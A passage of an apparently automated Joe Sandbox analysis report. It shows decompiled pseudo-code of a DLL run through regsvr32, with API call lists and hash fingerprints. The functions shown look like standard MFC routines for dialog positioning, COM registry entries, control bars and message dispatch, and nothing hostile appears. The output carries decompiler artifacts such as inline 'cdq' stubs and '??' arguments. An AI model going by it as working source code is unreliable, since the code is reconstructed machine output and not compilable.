                                                                                                                						_t103 = GetWindowLongA(_t121, 0xfffffff0);
                                                                                                                						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
                                                                                                                							_t121 = 0;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_v100 = 0x28;
                                                                                                                					if(_t121 != 0) {
                                                                                                                						GetWindowRect(_t121,  &_v44);
                                                                                                                						E10011243(_t121, E100111D8(_t121, 2),  &_v100);
                                                                                                                						CopyRect( &_v28,  &_v80);
                                                                                                                					} else {
                                                                                                                						_t94 = E10012730();
                                                                                                                						if(_t94 != 0) {
                                                                                                                							_t94 =  *((intOrPtr*)(_t94 + 0x20));
                                                                                                                						}
                                                                                                                						E10011243(_t121, E100111D8(_t94, 1),  &_v100);
                                                                                                                						CopyRect( &_v44,  &_v80);
                                                                                                                						CopyRect( &_v28,  &_v80);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t108 = _v60.left;
                                                                                                                				asm("cdq");
                                                                                                                				_t123 = _v60.right - _t108;
                                                                                                                				asm("cdq");
                                                                                                                				_t120 = _v44.bottom;
                                                                                                                				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
                                                                                                                				_a4 = _v60.bottom - _v60.top;
                                                                                                                				asm("cdq");
                                                                                                                				asm("cdq");
                                                                                                                				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
                                                                                                                				if(_t116 >= _v28.left) {
                                                                                                                					if(_t123 + _t116 > _v28.right) {
                                                                                                                						_t116 = _t108 - _v60.right + _v28.right;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t116 = _v28.left;
                                                                                                                				}
                                                                                                                				if(_t129 >= _v28.top) {
                                                                                                                					if(_a4 + _t129 > _v28.bottom) {
                                                                                                                						_t129 = _v60.top - _v60.bottom + _v28.bottom;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t129 = _v28.top;
                                                                                                                				}
                                                                                                                				return E10017C59(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
                                                                                                                			}


























                                                                                                                APIs
                                                                                                                  • Part of subcall function 100177F8: GetWindowLongA.USER32(?,000000F0), ref: 10017803
                                                                                                                • GetParent.USER32(?), ref: 100139DD
                                                                                                                • SendMessageA.USER32 ref: 10013A00
                                                                                                                • GetWindowRect.USER32 ref: 10013A1A
                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 10013A30
                                                                                                                • CopyRect.USER32(?,?), ref: 10013A7D
                                                                                                                • CopyRect.USER32(?,?), ref: 10013A87
                                                                                                                • GetWindowRect.USER32 ref: 10013A90
                                                                                                                • CopyRect.USER32(?,?), ref: 10013AAC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                • String ID: (
                                                                                                                • API String ID: 808654186-3887548279
                                                                                                                • Opcode ID: 7d36992815b7c82f4186bf24b3e9f02ba7339f80983b16d8183d78d4b2b26388
                                                                                                                • Instruction ID: cdef7b8ec397d2e35f5d148a9b825cf63a8d49ca7f47ea8acb5fdff55329149a
                                                                                                                • Opcode Fuzzy Hash: 7d36992815b7c82f4186bf24b3e9f02ba7339f80983b16d8183d78d4b2b26388
                                                                                                                • Instruction Fuzzy Hash: 02516F72900219AFDB00CBA8CD85EEEBBB9FF48250F154155F915FB291DB30ED818B50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 95%
                                                                                                                			E10044D1A(void* __ecx, void* _a4, void* _a8, void* _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				void* _t20;
                                                                                                                				CHAR* _t23;
                                                                                                                				signed int _t25;
                                                                                                                				void* _t26;
                                                                                                                				signed int _t31;
                                                                                                                				int _t33;
                                                                                                                				CHAR* _t36;
                                                                                                                				char* _t42;
                                                                                                                				CHAR* _t48;
                                                                                                                
                                                                                                                				_t20 = _a12;
                                                                                                                				_v8 = _t20;
                                                                                                                				_t3 =  &_v8;
                                                                                                                				 *_t3 = _v8 & 0x00000001;
                                                                                                                				_t42 = "Insertable";
                                                                                                                				if( *_t3 == 0) {
                                                                                                                					L9:
                                                                                                                					_t36 = 0;
                                                                                                                					__eflags = _t20 & 0x00000002;
                                                                                                                					if((_t20 & 0x00000002) != 0) {
                                                                                                                						_t36 = "Apartment";
                                                                                                                					}
                                                                                                                					__eflags = _t20 & 0x00000004;
                                                                                                                					if((_t20 & 0x00000004) != 0) {
                                                                                                                						_t36 = 0x100b9d90;
                                                                                                                					}
                                                                                                                					__eflags = (_t20 & 0x00000006) - 6;
                                                                                                                					if((_t20 & 0x00000006) == 6) {
                                                                                                                						_t36 = 0x100b9d88;
                                                                                                                					}
                                                                                                                					__eflags = _t36;
                                                                                                                					if(_t36 == 0) {
                                                                                                                						L21:
                                                                                                                						_t23 = 1;
                                                                                                                						goto L7;
                                                                                                                					} else {
                                                                                                                						_t25 = RegOpenKeyExA(_a8, "InprocServer32", 0, 0x20006,  &_a12);
                                                                                                                						asm("sbb esi, esi");
                                                                                                                						_t48 =  ~_t25 + 1;
                                                                                                                						__eflags = _t48;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							_t26 = E1001E302(_t36, _t42, _t48, __eflags);
                                                                                                                							__eflags =  *((char*)(_t26 + 0x14));
                                                                                                                							if( *((char*)(_t26 + 0x14)) == 0) {
                                                                                                                								_t48 = 1;
                                                                                                                								__eflags = 1;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							_t31 = RegSetValueExA(_a12, "ThreadingModel", 0, 1, _t36, lstrlenA(_t36) + 1);
                                                                                                                							asm("sbb esi, esi");
                                                                                                                							_t48 =  ~_t31 + 1;
                                                                                                                							RegCloseKey(_a12);
                                                                                                                						}
                                                                                                                						__eflags = _t48;
                                                                                                                						if(_t48 == 0) {
                                                                                                                							L4:
                                                                                                                							if(_v8 != 0) {
                                                                                                                								RegDeleteValueA(_a8, _t42);
                                                                                                                								RegDeleteValueA(_a4, _t42);
                                                                                                                							}
                                                                                                                							_t23 = _t48;
                                                                                                                							L7:
                                                                                                                							return _t23;
                                                                                                                						} else {
                                                                                                                							goto L21;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t33 = RegSetValueA(_a4, _t42, 1, 0x1009c448, 0);
                                                                                                                				if(_t33 != 0 || RegSetValueA(_a8, _t42, 1, 0x1009c448, _t33) != 0) {
                                                                                                                					_t48 = 0;
                                                                                                                					goto L4;
                                                                                                                				} else {
                                                                                                                					_t20 = _a12;
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                			}

















                                                                                                                0x10044de9
                                                                                                                0x10044deb
                                                                                                                0x10044dec
                                                                                                                0x10044dec
                                                                                                                0x10044e02
                                                                                                                0x10044e04
                                                                                                                0x10044d5c
                                                                                                                0x10044d60
                                                                                                                0x10044d6c
                                                                                                                0x10044d72
                                                                                                                0x10044d72
                                                                                                                0x10044d74
                                                                                                                0x10044d76
                                                                                                                0x10044d7a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10044e04
                                                                                                                0x10044da2
                                                                                                                0x10044d46
                                                                                                                0x10044d4a
                                                                                                                0x10044d5a
                                                                                                                0x00000000
                                                                                                                0x10044d7d
                                                                                                                0x10044d7d
                                                                                                                0x00000000
                                                                                                                0x10044d7d

                                                                                                                APIs
                                                                                                                • RegSetValueA.ADVAPI32(?,Insertable,00000001,1009C448,00000000), ref: 10044D46
                                                                                                                • RegSetValueA.ADVAPI32(?,Insertable,00000001,1009C448,00000000), ref: 10044D54
                                                                                                                • RegDeleteValueA.ADVAPI32(?,Insertable), ref: 10044D6C
                                                                                                                • RegDeleteValueA.ADVAPI32(?,Insertable), ref: 10044D72
                                                                                                                • RegOpenKeyExA.ADVAPI32(?,InprocServer32,00000000,00020006,?), ref: 10044DB7
                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 10044DC7
                                                                                                                • RegSetValueExA.ADVAPI32(?,ThreadingModel,00000000,00000001,00000000,00000001), ref: 10044DDC
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10044DEC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value$Delete$CloseOpenlstrlen
                                                                                                                • String ID: Apartment$Both$Free$InprocServer32$Insertable$ThreadingModel
                                                                                                                • API String ID: 46240047-3148118246
                                                                                                                • Opcode ID: aafacc9b3fa97a60019edab9fff937d2876df9436f88eb903090ddf3a926996a
                                                                                                                • Instruction ID: 89be5a4af83577de0a95365c2b53f1604eb0eed360df1fb52f4b20aaa0cd6183
                                                                                                                • Opcode Fuzzy Hash: aafacc9b3fa97a60019edab9fff937d2876df9436f88eb903090ddf3a926996a
                                                                                                                • Instruction Fuzzy Hash: 0021B571A00269BBEB51DF91CCC5FAF7BA8EB45B94F124134FE12EA161CB708D11C6A4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 98%
                                                                                                                			E10036498(intOrPtr* __ecx, void* __ebp, struct HWND__* _a4, signed int _a8) {
                                                                                                                				struct HWND__* _v0;
                                                                                                                				intOrPtr _v4;
                                                                                                                				signed int _v8;
                                                                                                                				char _v12;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				intOrPtr _t58;
                                                                                                                				char _t60;
                                                                                                                				int _t62;
                                                                                                                				int* _t64;
                                                                                                                				int _t67;
                                                                                                                				struct HWND__* _t70;
                                                                                                                				struct HWND__* _t76;
                                                                                                                				struct HWND__* _t81;
                                                                                                                				struct HMENU__* _t83;
                                                                                                                				signed int _t92;
                                                                                                                				intOrPtr* _t100;
                                                                                                                				struct HMENU__* _t103;
                                                                                                                				intOrPtr* _t106;
                                                                                                                				void* _t113;
                                                                                                                				int* _t122;
                                                                                                                				intOrPtr* _t123;
                                                                                                                				void* _t124;
                                                                                                                				signed int _t130;
                                                                                                                				signed int _t148;
                                                                                                                
                                                                                                                				_t124 = __ebp;
                                                                                                                				_t107 = __ecx;
                                                                                                                				_t122 = _a8;
                                                                                                                				_t103 = 0;
                                                                                                                				_t132 = _t122;
                                                                                                                				_t123 = __ecx;
                                                                                                                				if(_t122 != 0) {
                                                                                                                					L2:
                                                                                                                					_t58 =  *((intOrPtr*)( *_t123 + 0x140))();
                                                                                                                					_v4 = _t58;
                                                                                                                					if(_t58 == _t103) {
                                                                                                                						goto L1;
                                                                                                                					} else {
                                                                                                                						if(_a4 != _t103) {
                                                                                                                							_t100 = _t58 + 0x80;
                                                                                                                							if( *_t100 != _t103) {
                                                                                                                								 *((intOrPtr*)( *((intOrPtr*)( *_t100)) + 0x5c))(_t103);
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t60 =  *((intOrPtr*)(_t123 + 0x88));
                                                                                                                						_push(_t124);
                                                                                                                						_a8 = _t103;
                                                                                                                						_v12 = _t60;
                                                                                                                						if(_t60 == _t103) {
                                                                                                                							L16:
                                                                                                                							_t122[2] = _a8;
                                                                                                                							if(_a4 == _t103) {
                                                                                                                								 *(_t123 + 0xb4) = _t103;
                                                                                                                								_t62 = GetDlgItem( *(_t123 + 0x20), 0xea21);
                                                                                                                								__eflags = _t62;
                                                                                                                								_a4 = _t62;
                                                                                                                								if(_t62 != 0) {
                                                                                                                									_t76 = GetDlgItem( *(_t123 + 0x20), 0xe900);
                                                                                                                									__eflags = _t76;
                                                                                                                									if(_t76 != 0) {
                                                                                                                										SetWindowLongA(_t76, 0xfffffff4, 0xea21);
                                                                                                                									}
                                                                                                                									SetWindowLongA(_a4, 0xfffffff4, 0xe900);
                                                                                                                								}
                                                                                                                								__eflags = _t122[1];
                                                                                                                								if(_t122[1] != 0) {
                                                                                                                									InvalidateRect( *(_t123 + 0x20), 0, 1);
                                                                                                                									SetMenu( *(_t123 + 0x20), _t122[1]);
                                                                                                                								}
                                                                                                                								_t64 = _v4 + 0x80;
                                                                                                                								__eflags =  *_t64;
                                                                                                                								if( *_t64 != 0) {
                                                                                                                									 *((intOrPtr*)( *( *_t64) + 0x5c))(1);
                                                                                                                								}
                                                                                                                								 *((intOrPtr*)( *_t123 + 0x148))(1);
                                                                                                                								_t67 =  *_t122;
                                                                                                                								__eflags = _t67 - 0xe900;
                                                                                                                								if(_t67 != 0xe900) {
                                                                                                                									_v0 = GetDlgItem( *(_t123 + 0x20), _t67);
                                                                                                                								}
                                                                                                                								ShowWindow(_v0, 5);
                                                                                                                								 *(_t123 + 0x60) = _t122[5];
                                                                                                                								_t70 = E10034CE4(1);
                                                                                                                								L36:
                                                                                                                								return _t70;
                                                                                                                							}
                                                                                                                							 *(_t123 + 0xb4) = _t122[4];
                                                                                                                							E10034CE4(_t103);
                                                                                                                							_t81 = GetDlgItem( *(_t123 + 0x20),  *_t122);
                                                                                                                							_v0 = _t81;
                                                                                                                							ShowWindow(_t81, _t103);
                                                                                                                							_t83 = GetMenu( *(_t123 + 0x20));
                                                                                                                							_t122[1] = _t83;
                                                                                                                							if(_t83 != _t103) {
                                                                                                                								InvalidateRect( *(_t123 + 0x20), _t103, 1);
                                                                                                                								SetMenu( *(_t123 + 0x20), _t103);
                                                                                                                								_t33 = _t123 + 0xd0;
                                                                                                                								 *_t33 =  *(_t123 + 0xd0) & 0xfffffffe;
                                                                                                                								_t148 =  *_t33;
                                                                                                                							}
                                                                                                                							_t122[5] =  *(_t123 + 0x60);
                                                                                                                							 *(_t123 + 0x60) = _t103;
                                                                                                                							E10035469(_t123, _t148, 0x7915);
                                                                                                                							if( *_t122 == 0xe900) {
                                                                                                                								L22:
                                                                                                                								_t70 = _a4;
                                                                                                                								goto L23;
                                                                                                                							} else {
                                                                                                                								_t70 = GetDlgItem( *(_t123 + 0x20), 0xe900);
                                                                                                                								L23:
                                                                                                                								if(_t70 != 0) {
                                                                                                                									_t70 = SetWindowLongA(_t70, 0xfffffff4, 0xea21);
                                                                                                                								}
                                                                                                                								goto L36;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							goto L7;
                                                                                                                						}
                                                                                                                						while(1) {
                                                                                                                							L7:
                                                                                                                							_t113 = _t123 + 0x84;
                                                                                                                							_t106 =  *((intOrPtr*)(E10012115( &_v12)));
                                                                                                                							if(_t106 == 0) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							_t92 = GetDlgCtrlID( *(_t106 + 0x20)) & 0x0000ffff;
                                                                                                                							_v8 = _t92;
                                                                                                                							if(_t92 - 0xe800 <= 0x1f) {
                                                                                                                								_t130 = 1 << _t92 - 0xe800;
                                                                                                                								if( *((intOrPtr*)( *_t106 + 0x154))() != 0) {
                                                                                                                									_a8 = _a8 | 1;
                                                                                                                								}
                                                                                                                								if( *((intOrPtr*)( *_t106 + 0x15c))() == 0 || _v8 != 0xe81f) {
                                                                                                                									E10035F35(_t123, _t106, _t122[2] & _t130, 1);
                                                                                                                								}
                                                                                                                							}
                                                                                                                							if(_v12 != 0) {
                                                                                                                								continue;
                                                                                                                							} else {
                                                                                                                								_t103 = 0;
                                                                                                                								goto L16;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						E1000A069(_t106, _t113, _t122, _t123, __eflags);
                                                                                                                						goto L22;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L1:
                                                                                                                				E1000A069(_t103, _t107, _t122, _t123, _t132);
                                                                                                                				goto L2;
                                                                                                                			}






























                                                                                                                APIs
                                                                                                                • GetDlgCtrlID.USER32 ref: 1003650C
                                                                                                                • GetDlgItem.USER32(?,?), ref: 100365A3
                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 100365AB
                                                                                                                • GetMenu.USER32 ref: 100365B4
                                                                                                                • InvalidateRect.USER32(00000001,00000000,00000001), ref: 100365C7
                                                                                                                • SetMenu.USER32 ref: 100365D1
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                • GetDlgItem.USER32(0000E900,0000E900), ref: 10036600
                                                                                                                • SetWindowLongA.USER32 ref: 1003661D
                                                                                                                • GetDlgItem.USER32(0000EA21,0000EA21), ref: 1003663C
                                                                                                                • GetDlgItem.USER32(0000E900,0000E900), ref: 1003664F
                                                                                                                • SetWindowLongA.USER32 ref: 1003665D
                                                                                                                • SetWindowLongA.USER32 ref: 1003666A
                                                                                                                • InvalidateRect.USER32(00000001,00000000,00000001), ref: 1003667D
                                                                                                                • SetMenu.USER32 ref: 10036689
                                                                                                                • GetDlgItem.USER32(00000000,00000000), ref: 100366BE
                                                                                                                • ShowWindow.USER32(?,00000005), ref: 100366CA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemWindow$LongMenu$InvalidateRectShow$CtrlException@8H_prolog3Throw
                                                                                                                • String ID:
                                                                                                                • API String ID: 4160985441-0
                                                                                                                • Opcode ID: 017ece0ee0ca91853db6539d47dc82f8072cbc3049108b4c43f3cf731b890b4e
                                                                                                                • Instruction ID: 54e0ea85a30db0f840d0658cc435978594878730bfb9ef9f52a14b7152f25a01
                                                                                                                • Opcode Fuzzy Hash: 017ece0ee0ca91853db6539d47dc82f8072cbc3049108b4c43f3cf731b890b4e
                                                                                                                • Instruction Fuzzy Hash: 056169756007019FEB11DF64CC89A6AB7E5FF49386F004A6DF19A9A2A0DB30E854CB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 75%
                                                                                                                			E100270E7(intOrPtr* __ecx, struct tagMSG* _a4, intOrPtr* _a8) {
                                                                                                                				intOrPtr* _v8;
                                                                                                                				struct tagPOINT _v16;
                                                                                                                				struct tagMSG _v44;
                                                                                                                				int _t29;
                                                                                                                				struct HWND__* _t32;
                                                                                                                				int _t45;
                                                                                                                				long _t59;
                                                                                                                				intOrPtr _t63;
                                                                                                                				int _t64;
                                                                                                                				struct HWND__* _t68;
                                                                                                                				struct HWND__* _t76;
                                                                                                                				struct tagMSG* _t77;
                                                                                                                
                                                                                                                				_t77 = _a4;
                                                                                                                				_t29 = _t77->message;
                                                                                                                				_v8 = __ecx;
                                                                                                                				if(_t29 == 0x367 || _t29 == 0x100 && _t77->wParam == 0x1b) {
                                                                                                                					_push(1);
                                                                                                                					_push(_t29);
                                                                                                                					_push(_t29);
                                                                                                                					_push(0);
                                                                                                                					goto L37;
                                                                                                                				} else {
                                                                                                                					if(_t29 < 0x200 || _t29 > 0x209) {
                                                                                                                						if(_t29 < 0xa0 || _t29 > 0xa9) {
                                                                                                                							if(_t29 == 0x112 || _t29 >= 0x100 && _t29 <= 0x109) {
                                                                                                                								_t32 = GetCapture();
                                                                                                                								_t76 = 0;
                                                                                                                								if(_t32 == 0) {
                                                                                                                									L29:
                                                                                                                									if(PeekMessageA(_t77, _t76, _t77->message, _t77->message, _t76) == 0) {
                                                                                                                										goto L35;
                                                                                                                									}
                                                                                                                									GetMessageA(_t77, _t76, _t77->message, _t77->message);
                                                                                                                									_push(_t77);
                                                                                                                									if( *((intOrPtr*)( *_v8 + 0x100))() != 0) {
                                                                                                                										goto L35;
                                                                                                                									}
                                                                                                                									TranslateMessage(_t77);
                                                                                                                									_t45 = _t77->message;
                                                                                                                									if(_t45 == 0x112 || _t45 >= 0x104 && _t45 <= 0x107) {
                                                                                                                										goto L34;
                                                                                                                									} else {
                                                                                                                										goto L35;
                                                                                                                									}
                                                                                                                								}
                                                                                                                								ReleaseCapture();
                                                                                                                								do {
                                                                                                                								} while (PeekMessageA( &_v44, 0, 0x200, 0x209, 3) != 0);
                                                                                                                								goto L29;
                                                                                                                							} else {
                                                                                                                								if(PeekMessageA(_t77, 0, _t29, _t29, 1) == 0) {
                                                                                                                									goto L8;
                                                                                                                								}
                                                                                                                								goto L20;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							goto L7;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						L7:
                                                                                                                						_t68 = L10026FD8(_v8, _t77->pt, _t77->pt.y,  &_a4);
                                                                                                                						_t76 = 0;
                                                                                                                						if(_t68 != 0) {
                                                                                                                							if(_a4 == 0) {
                                                                                                                								PeekMessageA(_t77, 0, _t77->message, _t77->message, 1);
                                                                                                                								L20:
                                                                                                                								DispatchMessageA(_t77);
                                                                                                                								goto L8;
                                                                                                                							}
                                                                                                                							if(_t77->message == 0x201) {
                                                                                                                								_t59 = SendMessageA(_t68, 0x84, 0, (_t77->pt.y & 0x0000ffff) << 0x00000010 | _t77->pt & 0x0000ffff);
                                                                                                                								if(_t59 == 5 || _t59 == 3) {
                                                                                                                									ReleaseCapture();
                                                                                                                									GetMessageA(_t77, _t76, 0xa1, 0xa1);
                                                                                                                									L34:
                                                                                                                									DispatchMessageA(_t77);
                                                                                                                									L35:
                                                                                                                									GetCursorPos( &_v16);
                                                                                                                									L10026FD8(_v8, _v16.x, _v16.y, _t76);
                                                                                                                									goto L8;
                                                                                                                								} else {
                                                                                                                									if(_t59 != 1) {
                                                                                                                										_t63 = L10026E3E(_t59);
                                                                                                                									} else {
                                                                                                                										_t63 = L10026DD0(_t68, _t77->pt, _t77->pt.y);
                                                                                                                									}
                                                                                                                									_push(1);
                                                                                                                									 *_a8 = _t63;
                                                                                                                									_t64 = _t77->message;
                                                                                                                									_push(_t64);
                                                                                                                									_push(_t64);
                                                                                                                									_push(_t76);
                                                                                                                									L37:
                                                                                                                									PeekMessageA(_t77, ??, ??, ??, ??);
                                                                                                                									return 0;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							PeekMessageA(_t77, 0, _t77->message, _t77->message, 1);
                                                                                                                						}
                                                                                                                						L8:
                                                                                                                						return 1;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}
















                                                                                                                APIs
                                                                                                                • PeekMessageA.USER32(?,00000000,00000201,00000201,00000001), ref: 10027178
                                                                                                                • SendMessageA.USER32 ref: 10027195
                                                                                                                • ReleaseCapture.USER32 ref: 100271D0
                                                                                                                • GetMessageA.USER32 ref: 100271DF
                                                                                                                • PeekMessageA.USER32(?,00000000,?,?,00000001), ref: 100271F3
                                                                                                                • DispatchMessageA.USER32 ref: 100271FA
                                                                                                                • DispatchMessageA.USER32 ref: 100272A8
                                                                                                                • GetCursorPos.USER32(?), ref: 100272B2
                                                                                                                • PeekMessageA.USER32(?,00000000,?,?,00000001), ref: 100272D3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Peek$Dispatch$CaptureCursorReleaseSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 597789953-0
                                                                                                                • Opcode ID: 48c5a11eb3a8d3d632750daefe0e14eb920db7b13074f27541598bdfc59b2dac
                                                                                                                • Instruction ID: 0133134a9c7e2fbc1140e53e7cb55acdd5b0000d3e4746bd5cbf52369a1aa7df
                                                                                                                • Opcode Fuzzy Hash: 48c5a11eb3a8d3d632750daefe0e14eb920db7b13074f27541598bdfc59b2dac
                                                                                                                • Instruction Fuzzy Hash: 6351BD34A00615FBEB21DBA4ED88EAF37BDFF8A741F900419F94AD2190D774E9948721
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 92%
                                                                                                                			E1003FF42(void* __ebx, struct HWND__* _a4, intOrPtr _a8, short _a12, signed int _a16) {
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t31;
                                                                                                                				signed int _t33;
                                                                                                                				void* _t40;
                                                                                                                				int _t46;
                                                                                                                				void* _t51;
                                                                                                                				intOrPtr _t52;
                                                                                                                				signed int _t58;
                                                                                                                				signed int* _t66;
                                                                                                                				void* _t67;
                                                                                                                				signed int _t68;
                                                                                                                				signed int _t70;
                                                                                                                
                                                                                                                				_t51 = __ebx;
                                                                                                                				if(_a4 != 0) {
                                                                                                                					_push(_t67);
                                                                                                                					_push(0x1000a083);
                                                                                                                					_t54 = 0x100bdc04;
                                                                                                                					_t68 = E10020A61(__ebx, 0x100bdc04, 0, _t67, __eflags);
                                                                                                                					__eflags = _t68;
                                                                                                                					if(__eflags == 0) {
